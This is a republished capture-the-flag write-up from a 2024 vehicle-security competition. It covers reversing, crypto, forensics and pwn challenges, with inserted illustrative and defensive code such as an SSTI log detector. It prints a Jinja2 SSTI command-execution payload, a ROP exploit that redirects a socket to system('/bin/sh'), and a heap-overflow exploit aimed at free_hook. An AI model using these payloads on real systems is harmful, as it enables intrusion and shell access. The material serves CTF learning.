2024WIDC WriteUp by SAINTSEC

admin · 2024-05-24 20:52:42

Day1 - Simple Embedded Program Reversing

Reversing the assembly gives the encryption logic: for each character, add 3 to its ASCII value and XOR the result with 9. Base64-decode the data supplied by the challenge and run it through the same transformation to obtain the flag.

# the challenge data after base64 decoding
b64_decode_str = "lx9bma<lv]bc|azxeap:bv_k.l5:g;e9:g5g-ge:WnhNeGi=U6_-x]u^7XlpI;wZ^]"

flag = ""
for a in b64_decode_str:
    # same transform as the firmware: (ASCII + 3) XOR 9
    flag += chr((ord(a) + 3) ^ 9)
print(flag)
#fr5lym6fpilovmtramz4lpkg8f14c7a54c1c9ca4SxbXaCeIQ0k9riqh3RfzE7sThi

Day1 - Insecure Automaker Intranet

On login the username is reflected in the page, and the response headers reveal Flask, so this is SSTI. The following exploit completes the attack:

import requests

url = "http://172.10.0.21:8000/register"

# Jinja2 expression evaluated server-side when the username is reflected
payload = '''
{{lipsum.__globals__['os'].popen('cat ./flag/flag').read()}}
'''

print(requests.post(url, data={"user": payload}).text)
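From the defender's side, the same payload shape is easy to spot before it reaches the template engine. This is an added example (not the team's code) that scores a user-supplied value on the Jinja2 delimiters and object names the payload above relies on, then runs the check over constructed application log lines whose format ("... user=<value> status=<code>") is an assumption.

```python
import re

# Indicator classes for Jinja2 template injection: expression delimiters,
# attribute walking through dunder names, template globals used as a
# starting object (the writeup's payload uses lipsum), and execution sinks.
INDICATORS = {
    "jinja_expr":   re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S),
    "dunder_attr":  re.compile(r"__(?:globals|class|builtins|subclasses|import|mro|base)__"),
    "jinja_global": re.compile(r"\b(?:lipsum|cycler|joiner|namespace|config|request|self)\b"),
    "exec_call":    re.compile(r"\b(?:popen|system|subprocess|eval|exec)\b"),
}


def ssti_indicators(value: str) -> list:
    """Names of the indicator classes matched by one user-supplied value.
    'jinja_global' alone is weak (a user can be called 'self'); a hit on
    'jinja_expr' is what makes the value a probe."""
    return [name for name, rx in INDICATORS.items() if rx.search(value)]


def scan_log(lines):
    """Return (line_no, user_value, indicators) for lines whose user field looks like a probe.
    Assumed (constructed) log format: '<ts> POST /register user=<value> status=<code>'."""
    field = re.compile(r"user=(.*?) status=")
    hits = []
    for no, line in enumerate(lines, 1):
        m = field.search(line)
        if not m:
            continue
        found = ssti_indicators(m.group(1))
        if found:
            hits.append((no, m.group(1), found))
    return hits


# Constructed sample lines: a normal login, a {{7*7}} probe, the writeup's
# payload, and a username that merely contains template delimiters.
SAMPLE_LOG = [
    "2024-05-24T20:52:42 POST /register user=alice status=200",
    "2024-05-24T20:52:51 POST /register user={{7*7}} status=200",
    "2024-05-24T20:53:03 POST /register user={{lipsum.__globals__['os'].popen('cat ./flag/flag').read()}} status=200",
    "2024-05-24T20:53:10 POST /register user=bob_{{name}} status=200",
]

if __name__ == "__main__":
    for no, user, found in scan_log(SAMPLE_LOG):
        print(no, found, user)
```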

Day1 - IVIServer

Original challenge link:

https://7ee1n.github.io/2021/11/07/BSidesAhmedabadCTF2021/

from pwn import *
context.log_level = 'debug'
context.binary = ELF('./server')
elf = ELF('./server')
libc = ELF('./libc-2.31.so')
SOCKFD = 4  # fd of the accepted client socket inside the server

# Note: the extracted page had dropped the backslashes of the byte-string
# escapes (b'x00', b'rn'); the \x00 and \r\n escapes are restored here.

def get(payload):
    # send one HTTP request whose oversized request line carries the ROP chain
    global p
    p = remote('pwn.bsidesahmedabad.in', 9080)
    py = flat({
        0: b'GET /',
        255: b'r',
        0x138: [
            payload
        ],
    }, filler=b'\x00')
    p.send(py + b'\r\n')

# stage 1: make the binary's own http_response() write the GOT entry of write(),
# which leaks the libc base
rop = ROP(elf)
rop.http_response(4, elf.got['write'])
get(rop.chain())
p.recvuntil(b'</html>\nHTTP/1.1')
libcbase = u64(p.recvline().strip().ljust(8, b'\x00')) - libc.symbols['write']
success(hex(libcbase))
libc.address = libcbase

# stage 2: point stdin/stdout/stderr at the socket and call system("/bin/sh")
rop = ROP(libc)
rop.dup2(SOCKFD, 0)
rop.dup2(SOCKFD, 1)
rop.dup2(SOCKFD, 2)
rop.system(next(libc.search(b'/bin/sh')))
get(rop.chain())

p.recvuntil(b'</html>\n')

p.interactive()


Day1 - In-Vehicle Communication Protocol

Port 1883 indicates the MQTT protocol.

Anonymous access is allowed. Connecting with the mqtt-pwn tool reveals a topic named flag.


Connect to the server with the MQTT.fx client and subscribe to the flag topic; a message arrives asking what we want.


Publish the answer: flag.


The reply says we have to play a number-guessing game.


Guessing the number by binary search yields the flag.


Day2 - Vehicle Authentication Algorithm

# SageMath script: matrix(), .LLL() and inverse_mod() are Sage built-ins;
# long_to_bytes comes from pycryptodome
from Crypto.Util.number import *
q = 31133702248881127631782881523509514476295949917122267121183371475000133184586174714396793644108294610935657329746903823657946536256899714076625760275173956706353888064555549064829709009640322743264038620966294636309911212621150898337629208482500384052935025619985047550270255090023343971256783414328092914248587672386617566422965425207785676797600936839556684715022346892107346366574407526099471338642307133437759220537846448437788211849588664491112404963383693116467782205041029098512207782583480993966604998421344660336431260561583879139849901548024253578304205860692342713953570388722937954933289936897205980716117
h = 7479856923878243888440888672844723062047571272556529760791388804749830947638106557467887553359594527284215983651237303197361839342245930727075103851252694200077479188468017448449313614412769738144700971711549137789290733004590838892989968103378686521773849802601405707815668581933555308957750986742176692804532749076668670300598708809281336336814136161669355533687195881130337149759522328766625901698480300656083599150462729901168306146171589266181628852056728470683680551973098848836293771016415271912573220080593590309888271888517605697277144430578513191280950815089968643259211353244436267567557456053045262878466
c = 429633025508597849623581682941413262998122137449005442145138470065847327103036727404626306379284511549714302199598866480970675273975210441015457022843111558443561825331941415126255871526201864795940071437602555024286559341823246182157480790439813986927891748029716157798569943993538191841077926115352987414280071817801043098050542082078666616788674806002113613279589438740909428444797915581688744647694596536620226032782501572321014769949362774191243994608572057792056353664666429685043726397327996076875440373242053749476708726634285972033216701275507339428064215442465140310384610569381749508378023099179079407328

# f*h = g (mod q), so the lattice spanned by (h, 1) and (q, 0) contains the
# short vector (g, f); LLL returns it as the first row
A=matrix([[h,1],[q,0]])
lll=A.LLL()
g,f=lll[0]

g,f=abs(g),abs(f)
#print(g)
#print(f)

# f*c mod q equals r*g + f*m as an integer (no wrap-around), so reducing
# mod g and multiplying by f^-1 mod g leaves the message
a=f*c%q
f_i=inverse_mod(f,g)
b=f_i*a %g

f=long_to_bytes(b)
print(f)
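The same recovery in plain Python on a small constructed instance, added here as an example rather than the team's Sage script: a 2-dimensional lattice needs only Lagrange (Gauss) reduction in place of LLL, and the parameters Q, F, G, the nonce and the message are made up for the demo.

```python
from fractions import Fraction


def lagrange_reduce(u, v):
    """Shortest vector of the 2-D lattice spanned by u and v (exact integer arithmetic)."""
    dot = lambda a, b: a[0] * b[0] + a[1] * b[1]
    while True:
        if dot(u, u) > dot(v, v):
            u, v = v, u                      # keep u the shorter basis vector
        # nearest integer to <u,v>/<u,u>; Fraction avoids float overflow on 2^250 values
        mu = round(Fraction(dot(u, v), dot(u, u)))
        if mu == 0:                          # |<u,v>| <= |u|^2/2: u is the shortest vector
            return u
        v = (v[0] - mu * u[0], v[1] - mu * u[1])


def recover_private_key(h, q):
    """The writeup's lattice [[h,1],[q,0]]: f*(h,1) - k*(q,0) = (g, f) is its shortest vector."""
    g, f = lagrange_reduce((h, 1), (q, 0))
    return abs(g), abs(f)                    # sign is arbitrary, exactly as in the Sage script


def decrypt(c, f, g, q):
    """Writeup arithmetic: a = f*c mod q = r*g + f*m (no wrap), then m = f^-1 * a mod g."""
    a = f * c % q
    return pow(f, -1, g) * a % g


# Constructed toy parameters (not the challenge's): q prime, f and g about 2^60 so
# r*g + f*m stays below q; consecutive odd numbers guarantee gcd(f, g) = 1.
Q = 2**127 - 1
F = 2**60 + 4241007
G = F + 2
H = G * pow(F, -1, Q) % Q                    # public key h = g * f^-1 mod q


def encrypt(m, r, h=H, q=Q):
    """c = r*h + m mod q with a small nonce r; m must be smaller than g."""
    return (r * h + m) % q


def demo():
    m = int.from_bytes(b"toy-msg", "big")   # 7 bytes, below G
    c = encrypt(m, 987654321987654321)       # constructed nonce, below 2^60
    g, f = recover_private_key(H, Q)         # attacker knows only (H, Q)
    return (g, f), decrypt(c, f, g, Q).to_bytes(7, "big")


if __name__ == "__main__":
    print(demo())
```

Uniqueness of the recovered vector follows from Hadamard's inequality: any lattice vector independent of (G, F) has norm at least Q / |(G, F)|, about 2^66, so the 2^60-sized private pair is the shortest vector the reduction returns.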

Day2 - Clues (蛛丝马迹)

Memory forensics: use volatility's filescan to locate flag.txt, then dump it to obtain flag.txt.


fn6ldn8kwak16bwg07abade65c253267OvAsF2gk8WPfyhTHKGxEV0BIpQX3DdRuroLlCq76jZJzYa4neat

Day2 - Head Unit Heap Overflow Exploitation

from pwn import *
context.log_level = 'debug'

#p=process('./pwn')
host, port = 'ip', 0     # placeholders: fill in the challenge's address
p = remote(host, port)

# constants used to build the two input lines; the names are the author's
push = 0x2A3D
pop  = 0xFFFF28
change2esp = -1
value2idx = 0x10101010
sub  = 0x11111
div  = 0x514

# addresses from the challenge binary
# system = 0x08051830
system = 0x08051c60
free_hook = 0x80e09f0

heap_off = (0x110-0x8)//4   # integer division: Python 3 '/' would produce a float


def create(d):
    # the service reads space-separated tokens
    return " ".join([str(x) for x in d])

payload = create([push,push,push,push,change2esp,push,sub,div,value2idx])

payload1 = create(['$0',system,4,heap_off,free_hook])


p.sendline(payload)
p.sendline(payload1)
p.interactive()

Day2 - OTA Update Decryption (pyc)

The pyc header is wrong. Trying the magic numbers of several major versions, the one for 3.8 decompiles correctly:
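The header-patching step written out as an added example (not code from the writeup): a pyc is built for the running interpreter, its magic is clobbered the way the challenge file's was, and the repair is checked by unmarshalling the code object; the magic table lists the CPython 3.7 to 3.11 release values.

```python
import importlib.util
import marshal
import struct

# PEP 552 layout (Python 3.7+): 4-byte magic, 4-byte flags, 8 bytes of
# mtime+size or source hash, then the marshalled code object.
HEADER_LEN = 16

# Magic words of CPython releases; the file stores them little-endian + b'\r\n'
KNOWN_MAGIC = {3394: "3.7", 3413: "3.8", 3425: "3.9", 3439: "3.10", 3495: "3.11"}


def read_magic(data):
    """Return (magic_word, version_label); label is None when the word is unknown."""
    if len(data) < HEADER_LEN or data[2:4] != b"\r\n":
        return None, None
    word = struct.unpack("<H", data[:2])[0]
    return word, KNOWN_MAGIC.get(word)


def patch_magic(data, magic_word):
    """Rewrite only the 4-byte magic; flags and timestamp/hash words are kept."""
    return struct.pack("<H", magic_word) + b"\r\n" + data[4:]


def build_pyc(source):
    """Constructed sample: a real pyc for the running interpreter, built in memory."""
    code = marshal.dumps(compile(source, "<sample>", "exec"))
    return importlib.util.MAGIC_NUMBER + struct.pack("<III", 0, 0, len(source)) + code


def load_code(data):
    """Unmarshal the code object; only succeeds when the magic matches the marshal format."""
    return marshal.loads(data[HEADER_LEN:])


def demo():
    running = struct.unpack("<H", importlib.util.MAGIC_NUMBER[:2])[0]
    good = build_pyc("KEY = 'asfdsf141fsad11f'\n")
    damaged = patch_magic(good, 0xFFFF)            # tampered header, as in the challenge
    assert read_magic(damaged) == (0xFFFF, None)
    repaired = patch_magic(damaged, running)       # candidate magic that matches the bytecode
    ns = {}
    exec(load_code(repaired), ns)
    return read_magic(repaired)[0] == running, ns["KEY"]


if __name__ == "__main__":
    print(demo())
```

Patching the magic never changes the bytecode itself, so a decompiler only produces sensible output once the chosen version matches the marshal format and opcode set the file was really built with.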


Then decompile with pycdc:

# Source Generated with Decompyle++
# File: 92BFABA74B71D8262D96EF9F046B8F1E.pyc (Python 3.8)

from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives import padding
from cryptography.hazmat.backends import default_backend
import base64

def encrypt(plaintext, key, iv):
    # pycdc rendered the keyword argument as "default_backend(), **('backend',)";
    # the actual call is backend=default_backend()
    cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend=default_backend())
    padder = padding.PKCS7(128).padder()
    padded_plaintext = padder.update(plaintext) + padder.finalize()
    encryptor = cipher.encryptor()
    ciphertext = encryptor.update(padded_plaintext) + encryptor.finalize()
    return base64.b64encode(ciphertext).decode()

plaintext = 'flag'
ciphertext = 'XalqLcjPTIHqHSnybH24Vy5BfobRchwUlKZpkfOmBoniTrW7dKgdgKg3npyW0ENJgkVlbHjKDTvj0UfSX6agvAGFVlgNV/HE2BS0ELZIM+xE3lU5LNDehjjKeW+ZhZuZjEohAqCJBsHX2zKMrtLlIQ=='
key = b'asfdsf141fsad11f'
iv = b'MDEyMzQ1Njc4OWFi'
ciphertext = encrypt(plaintext.encode(), key, iv)
print('密文:', ciphertext)

Plain AES; a short script produces the flag:

import base64
from Crypto.Cipher import AES

ciphertext = 'XalqLcjPTIHqHSnybH24Vy5BfobRchwUlKZpkfOmBoniTrW7dKgdgKg3npyW0ENJgkVlbHjKDTvj0UfSX6agvAGFVlgNV/HE2BS0ELZIM+xE3lU5LNDehjjKeW+ZhZuZjEohAqCJBsHX2zKMrtLlIQ=='
key = b'asfdsf141fsad11f'
iv = b'MDEyMzQ1Njc4OWFi'
aes = AES.new(key, AES.MODE_CBC, iv)
flag = aes.decrypt(base64.b64decode(ciphertext))
flag = flag[:-flag[-1]] # unpad
print(flag)
# b'ff6jrwtydqnlkduhjg1ab9pxjv6cgb3da80c9dfb8d827YgQDvitKJT1yE3rqOB9klXf7zxcVmoHMPFeu5h0AsC2UbLSNI6Gpn4WdwRZ8jame'

Day2 - Hardware Algorithm Mixed Reversing

Unpack with foremost; five files come out. AES_encode is a PyInstaller-packaged binary, so unpack it the usual way to get the pyc:

$ python2 pyinstxtractor.py AES_encode
[+] Processing AES_encode
[+] Pyinstaller version: 2.1+
[+] Python version: 3.11
[+] Length of package: 8816359 bytes
[+] Found 40 files in CArchive
[+] Beginning extraction...please standby
[+] Possible entry point: pyiboot01_bootstrap.pyc
[+] Possible entry point: pyi_rth_inspect.pyc
[+] Possible entry point: AES_encode.pyc
[!] Warning: This script is running in a different Python version than the one used to build the executable.
[!] Please run this script in Python 3.11 to prevent extraction errors during unmarshalling
[!] Skipping pyz extraction
[+] Successfully extracted pyinstaller archive: AES_encode

You can now use a python decompiler on the pyc files within the extracted directory

Since no decompiler supports 3.11 pyc yet, dump the bytecode with pycdas and reconstruct the source by hand:

AES_encode.pyc (Python 3.11)
[Code]
    File Name: AES_encode.py
    Object Name: <module>
    Qualified Name: <module>
    Arg Count: 0
    Pos Only Arg Count: 0
    KW Only Arg Count: 0
    Stack Size: 6
    Flags: 0x00000000
    [Names]
        'cryptography.hazmat.primitives.ciphers'
        'Cipher'
        'algorithms'
        'modes'
        'cryptography.hazmat.backends'
        'default_backend'
        'cryptography.hazmat.primitives'
        'padding'
        'simon_encode'
        'encrypt_all'
        'simon_decrypt'
        'simon_decrypt_all'
        'os'
        'generate_key'
        'aes_encrypt'
        'key'
        'open'
        'file'
        'read'
        'strip'
        'hex_key'
        'encode'
        'byte_key'
        'plaintext'
        'iv'
        'ciphertext'
        'print'
    [Locals+Names]
    [Constants]
        0
        (
            'Cipher'
            'algorithms'
            'modes'
        )
        (
            'default_backend'
        )
        (
            'padding'
        )
        (
            'encrypt_all'
        )
        (
            'simon_decrypt_all'
        )
        None
        [Code]
            File Name: AES_encode.py
            Object Name: generate_key
            Qualified Name: generate_key
            Arg Count: 0
            Pos Only Arg Count: 0
            KW Only Arg Count: 0
            Stack Size: 4
            Flags: 0x00000003 (CO_OPTIMIZED | CO_NEWLOCALS)
            [Names]
                'to_bytes'
            [Locals+Names]
                'original_hex'
            [Constants]
                None
                0x3836353635367830L
                32
                'big'
                (
                    'byteorder'
                )
            [Disassembly]
                0       RESUME                        0
                2       LOAD_CONST                    1: 0x3836353635367830L
                4       STORE_FAST                    0: original_hex
                6       LOAD_FAST                     0: original_hex
                8       LOAD_METHOD                   0: to_bytes
                30      LOAD_CONST                    2: 32
                32      LOAD_CONST                    3: 'big'
                34      KW_NAMES                      4
                36      PRECALL                       2
                40      CALL                          2
                50      POP_TOP                       
                52      LOAD_FAST                     0: original_hex
                54      LOAD_METHOD                   0: to_bytes
                76      LOAD_CONST                    2: 32
                78      LOAD_CONST                    3: 'big'
                80      KW_NAMES                      4
                82      PRECALL                       2
                86      CALL                          2
                96      RETURN_VALUE                  
        [Code]
            File Name: AES_encode.py
            Object Name: aes_encrypt
            Qualified Name: aes_encrypt
            Arg Count: 2
            Pos Only Arg Count: 0
            KW Only Arg Count: 0
            Stack Size: 6
            Flags: 0x00000003 (CO_OPTIMIZED | CO_NEWLOCALS)
            [Names]
                'os'
                'urandom'
                'Cipher'
                'algorithms'
                'AES'
                'modes'
                'CBC'
                'default_backend'
                'encryptor'
                'padding'
                'PKCS7'
                'padder'
                'update'
                'finalize'
            [Locals+Names]
                'plaintext'
                'key'
                'iv'
                'cipher'
                'encryptor'
                'padder'
                'padded_plaintext'
                'ciphertext'
            [Constants]
                None
                16
                (
                    'backend'
                )
                128
            [Disassembly]
                0       RESUME                        0
                2       LOAD_GLOBAL                   1: NULL + os
                14      LOAD_ATTR                     1: urandom
                24      LOAD_CONST                    1: 16
                26      PRECALL                       1
                30      CALL                          1
                40      STORE_FAST                    2: iv
                42      LOAD_GLOBAL                   5: NULL + Cipher
                54      LOAD_GLOBAL                   7: NULL + algorithms
                66      LOAD_ATTR                     4: AES
                76      LOAD_FAST                     1: key
                78      PRECALL                       1
                82      CALL                          1
                92      LOAD_GLOBAL                   11: NULL + modes
                104     LOAD_ATTR                     6: CBC
                114     LOAD_FAST                     2: iv
                116     PRECALL                       1
                120     CALL                          1
                130     LOAD_GLOBAL                   15: NULL + default_backend
                142     PRECALL                       0
                146     CALL                          0
                156     KW_NAMES                      2
                158     PRECALL                       3
                162     CALL                          3
                172     STORE_FAST                    3: cipher
                174     LOAD_FAST                     3: cipher
                176     LOAD_METHOD                   8: encryptor
                198     PRECALL                       0
                202     CALL                          0
                212     STORE_FAST                    4: encryptor
                214     LOAD_GLOBAL                   19: NULL + padding
                226     LOAD_ATTR                     10: PKCS7
                236     LOAD_CONST                    3: 128
                238     PRECALL                       1
                242     CALL                          1
                252     LOAD_METHOD                   11: padder
                274     PRECALL                       0
                278     CALL                          0
                288     STORE_FAST                    5: padder
                290     LOAD_FAST                     5: padder
                292     LOAD_METHOD                   12: update
                314     LOAD_FAST                     0: plaintext
                316     PRECALL                       1
                320     CALL                          1
                330     LOAD_FAST                     5: padder
                332     LOAD_METHOD                   13: finalize
                354     PRECALL                       0
                358     CALL                          0
                368     BINARY_OP                     0 (+)
                372     STORE_FAST                    6: padded_plaintext
                374     LOAD_FAST                     4: encryptor
                376     LOAD_METHOD                   12: update
                398     LOAD_FAST                     6: padded_plaintext
                400     PRECALL                       1
                404     CALL                          1
                414     LOAD_FAST                     4: encryptor
                416     LOAD_METHOD                   13: finalize
                438     PRECALL                       0
                442     CALL                          0
                452     BINARY_OP                     0 (+)
                456     STORE_FAST                    7: ciphertext
                458     LOAD_FAST                     2: iv
                460     LOAD_FAST                     7: ciphertext
                462     BUILD_TUPLE                   2
                464     RETURN_VALUE                  
        'flag.txt'
        'r'
        'cipflag:'
        'randomiv:'
    [Disassembly]
        0       RESUME                        0
        2       LOAD_CONST                    0: 0
        4       LOAD_CONST                    1: ('Cipher', 'algorithms', 'modes')
        6       IMPORT_NAME                   0: cryptography.hazmat.primitives.ciphers
        8       IMPORT_FROM                   1: Cipher
        10      STORE_NAME                    1: Cipher
        12      IMPORT_FROM                   2: algorithms
        14      STORE_NAME                    2: algorithms
        16      IMPORT_FROM                   3: modes
        18      STORE_NAME                    3: modes
        20      POP_TOP                       
        22      LOAD_CONST                    0: 0
        24      LOAD_CONST                    2: ('default_backend',)
        26      IMPORT_NAME                   4: cryptography.hazmat.backends
        28      IMPORT_FROM                   5: default_backend
        30      STORE_NAME                    5: default_backend
        32      POP_TOP                       
        34      LOAD_CONST                    0: 0
        36      LOAD_CONST                    3: ('padding',)
        38      IMPORT_NAME                   6: cryptography.hazmat.primitives
        40      IMPORT_FROM                   7: padding
        42      STORE_NAME                    7: padding
        44      POP_TOP                       
        46      LOAD_CONST                    0: 0
        48      LOAD_CONST                    4: ('encrypt_all',)
        50      IMPORT_NAME                   8: simon_encode
        52      IMPORT_FROM                   9: encrypt_all
        54      STORE_NAME                    9: encrypt_all
        56      POP_TOP                       
        58      LOAD_CONST                    0: 0
        60      LOAD_CONST                    5: ('simon_decrypt_all',)
        62      IMPORT_NAME                   10: simon_decrypt
        64      IMPORT_FROM                   11: simon_decrypt_all
        66      STORE_NAME                    11: simon_decrypt_all
        68      POP_TOP                       
        70      LOAD_CONST                    0: 0
        72      LOAD_CONST                    6: None
        74      IMPORT_NAME                   12: os
        76      STORE_NAME                    12: os
        78      LOAD_CONST                    7: <CODE> generate_key
        80      MAKE_FUNCTION                 0
        82      STORE_NAME                    13: generate_key
        84      LOAD_CONST                    8: <CODE> aes_encrypt
        86      MAKE_FUNCTION                 0
        88      STORE_NAME                    14: aes_encrypt
        90      PUSH_NULL                     
        92      LOAD_NAME                     13: generate_key
        94      PRECALL                       0
        98      CALL                          0
        108     STORE_NAME                    15: key
        110     PUSH_NULL                     
        112     LOAD_NAME                     16: open
        114     LOAD_CONST                    9: 'flag.txt'
        116     LOAD_CONST                    10: 'r'
        118     PRECALL                       2
        122     CALL                          2
        132     BEFORE_WITH                   
        134     STORE_NAME                    17: file
        136     LOAD_NAME                     17: file
        138     LOAD_METHOD                   18: read
        160     PRECALL                       0
        164     CALL                          0
        174     LOAD_METHOD                   19: strip
        196     PRECALL                       0
        200     CALL                          0
        210     STORE_NAME                    20: hex_key
        212     LOAD_CONST                    6: None
        214     LOAD_CONST                    6: None
        216     LOAD_CONST                    6: None
        218     PRECALL                       2
        222     CALL                          2
        232     POP_TOP                       
        234     JUMP_FORWARD                  11 (to 258)
        236     PUSH_EXC_INFO                 
        238     WITH_EXCEPT_START             
        240     POP_JUMP_FORWARD_IF_TRUE      4
        242     RERAISE                       2
        244     COPY                          3
        246     POP_EXCEPT                    
        248     RERAISE                       1
        250     POP_TOP                       
        252     POP_EXCEPT                    
        254     POP_TOP                       
        256     POP_TOP                       
        258     LOAD_NAME                     20: hex_key
        260     LOAD_METHOD                   21: encode
        282     PRECALL                       0
        286     CALL                          0
        296     STORE_NAME                    22: byte_key
        298     LOAD_NAME                     22: byte_key
        300     STORE_NAME                    23: plaintext
        302     PUSH_NULL                     
        304     LOAD_NAME                     14: aes_encrypt
        306     LOAD_NAME                     23: plaintext
        308     LOAD_NAME                     15: key
        310     PRECALL                       2
        314     CALL                          2
        324     UNPACK_SEQUENCE               2
        328     STORE_NAME                    24: iv
        330     STORE_NAME                    25: ciphertext
        332     PUSH_NULL                     
        334     LOAD_NAME                     26: print
        336     LOAD_CONST                    11: 'cipflag:'
        338     LOAD_NAME                     25: ciphertext
        340     FORMAT_VALUE                  0
        342     BUILD_STRING                  2
        344     PRECALL                       1
        348     CALL                          1
        358     POP_TOP                       
        360     PUSH_NULL                     
        362     LOAD_NAME                     26: print
        364     LOAD_CONST                    12: 'randomiv:'
        366     LOAD_NAME                     24: iv
        368     FORMAT_VALUE                  0
        370     BUILD_STRING                  2
        372     PRECALL                       1
        376     CALL                          1
        386     POP_TOP                       
        388     LOAD_CONST                    6: None
        390     RETURN_VALUE 

So it is just AES decryption: the ciphertext and IV are both given in the flag file, and the key comes from generate_key above (0x3836353635367830 as 32 big-endian bytes). Script:

from Crypto.Cipher import AES

# Note: the extracted page had dropped the backslashes of the byte-string
# escapes; the \xHH escapes (and the one literal backslash byte before \xd1)
# are restored here so that the IV is 16 bytes and the ciphertext 80 bytes.
key = 0x3836353635367830.to_bytes(32, byteorder='big')
iv = b'\xdd\x92\xd2\x1a\xb8\xe2<H\xb7\xfaN\x94\xc8\x1a$\xb3'
aes = AES.new(key, AES.MODE_CBC, iv)
flag = aes.decrypt(b'\xeb\xb1J:}\xb6\xadS\x89\x86\xab\xe7\x9bs\xd5\xeby\xf2\xde\xd2n\xf9\xa3\xa8Gk\xb2$BE\x03\x9f\xa1\xf7\xa9\x19\x85S\xa8Y\xe2V\x98\x8d\x1eu\x84\xbd`-\xca\xd4\xc3Em\\\xd1\xa1\xf7i6\xcb\x0c\x842t\xcc\x94\xe6\x94\xeeA\xb4H\xd32h\xf5\x13K')
print(flag)
# fplkvjfixpal7zc8h0agc93ea464d53ec012poaSm0ZUeWT16JEctXsnjdQNYyhello

Day2 - Vehicle Algorithm Reverse Decryption

The challenge description says AES and gives the ciphertext, key and IV, so decrypt directly:

import base64
from Crypto.Cipher import AES

ciphertext = base64.b64decode('w61n0tWJKuyNjBN7rX8Bx/X2hcgpYCwhmCvaYSy3Omqk1Uj1RH9NtYi66amBTQm9f9hziWC0N5wLzRkGylIWbxOv0bLOwuqmXY2TigRyzWw=')
key = base64.b64decode('7TapLcNbP8TqDWzwJElihy0TAFL/JCk7QZKtcuUKIvE=')
iv = base64.b64decode('Y64sxLZOyy0BSdBXsbzE/g==')
aes = AES.new(key, AES.MODE_CBC, iv)
flag = aes.decrypt(ciphertext)
print(flag)
# fvoelrnobjmfz1aknof7u24gfe5204521be119b3vOh9bsAqHGRlyXio6M0xtkEZ21nUmhelp

Day2 - debug Algorithm Reversing

The ciphertext is in sec.txt, and the method that computes the flag is the native getFlag function.


The ciphertext is also written out at runtime:


The ciphertext is 56 bytes long, and getFlag shows it is a Caesar shift of 3 followed by XOR with 3:


Script to undo the XOR:

buf = b"jm0g3{djyalj{4og3k1vequwbi:f61:6f;36:;2dkkfAWRjSv2UFDukk"

# undo the XOR layer first; the Caesar shift is removed afterwards
flag = []
for x in buf:
    x ^= 3
    flag.append(x)
print(bytes(flag))

Then the Caesar shift on dcode:


fk0a7udfwylfu4ia7e9rcosqxg6b2962b572658deebYQNfMr8SBDsee

Day2 - The Head Unit's Picture

The file with the .apk extension has a base64-encoded image at its end:


Extract it and fix it:


Day2 - The Secret of Safe Driving

zsteg gives it directly:


fdnef8gmlmj476wye0uaw1g5ad0dc6fb6bb3fc6FQAnjXIzoykL37aUltxbdN4Ye05s6THvMggo

Day2 - Vehicle Identity Verification

Decompiling reveals the AES ciphertext; following it leads to the key.


Decrypting gives the flag: fhol9vnxra362og8be02e6880be34cb5cmxZWQrDBTkv7ijgabPEOJN9wKRfloor

Day2 - A Leaf Blocking the View (一叶障目)

Open the docx as a zip archive to see the flag.


Originally published on the WeChat public account SAINTSEC: 2024WIDC WriteUp by SAINTSEC
Posted by admin on 2024-05-24 20:52:42. Source: https://cn-sec.com/archives/2775455.html